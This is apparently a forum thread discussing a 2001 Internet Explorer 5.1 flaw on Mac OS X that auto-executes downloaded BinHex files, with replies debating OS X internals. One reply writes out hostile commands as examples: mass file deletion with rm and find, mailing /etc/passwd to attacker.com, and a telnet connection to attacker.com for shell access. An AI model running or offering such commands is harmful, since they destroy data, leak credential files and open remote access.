Huge security hole in Internet Explorer for MacOS

Brad Lucier writes "Macintouch is reporting (go down the page a bit) that Internet Explorer 5.1, which comes preinstalled on MacOS X 10.1, has a huge security hole---when it downloads arbitrary programs encoded in the Macintosh's standard BinHex (.hqx) format, it automatically executes them. " Well I guess thats one way to make Unix insecure. Can anyone actually confirm this since it looks kinda sketchy. I wonder what someone's rationale would be for that:"Oh this won't hurt anyone, and saving that extra 'OK' click will be great!".

i didn't even think it was a bug

[SirSlud]

With MS's history, my friend discovered this three days ago and told me. Both of us assumed since it is an MS product that it was the way it was meant to be. Its such an obvious hole that we didn't even think it was a bug, just terrible and user-un-friendly design (as per the usual MS shit.)

Sounds like the recent slrn bug

[coyote-san]

This sounds a lot like the recently discovered slrn bug (see Bugtraq, LWN, Debian) that automatically executed all scripts encountered, apparently assuming they were self-extracting archive files.

However, I'm not sure Microsoft should be let off the hook for the equivalent behavior on the Mac. The Unix code was there for a very, very long time... when it was added it was a reasonable assumption that people would not send nasties because it was too easy to complain to their employer or grad department (the only way to get online) and cause the sender significant personal pain. (This is also a painful reminder that just because code is available doesn't mean that the right people are reviewing it.) In contrast, by the time somebody added that code to the Mac version of MSIE, the possibility of untraceable, hostile scripts should have been obvious.

Re:Intrinsic Security in OS X

[TrumpetPower!]

rm -rf /home/urchlay

If mass destruction is your aim, then the following will do the job nicely:

find / -user $USER -exec rm -f {} \;

Or, you could:

mail badguy@attacker.com < /etc/passwd

Maybe it'd be a program to brute-force su, something often possible (brute-forcing ssh or telnet usually isn't.

With a bit more work, you could:

telnet attacker.com 666

And run something on port 666 on attacker.com that gives attacker.com shell access.

All this assumes the rest of the operating system's security is iron-clad. Local exploits are, in general, much easier to pull off than remote ones. Account compromise is not a nice thing, at all.

b&

Wow are you way off...

[MO!]

Fact #1: MacOS X is based on FreeBSD 3.2 wrapped around a Mach microkernel.

Fact #2: FreeBSD does not use a Mach kernel.

Fact #3: The /etc/master.passwd file on a MacOS X system has nothing of value. It's there for legacy needs and has just the normal "shell=/bin/noshell" accounts as well as the disabled root account in it. To get useful information, you have to do a NetInfo dump of whatever class your looking for, in this case the encrypted passwd info.

Fact #4: The unix-like, BSD family, portion that makes up the base of MacOS X is not proprietary - it's called Darwin and is open and downloadable in source form (even ported to Intel). Only the upper level graphics system is closed. It's kinda like running a proprietary X Windows system on top of Linux.

Finally, Fact #5: Although there are some proprietary BSD-based OS's, the majority of the proprietary Unix OS's are based on AT&T->Novell->SCO->The OpenGroup code - not on BSD.

Please investigate your claims before boasting such innaccuracies.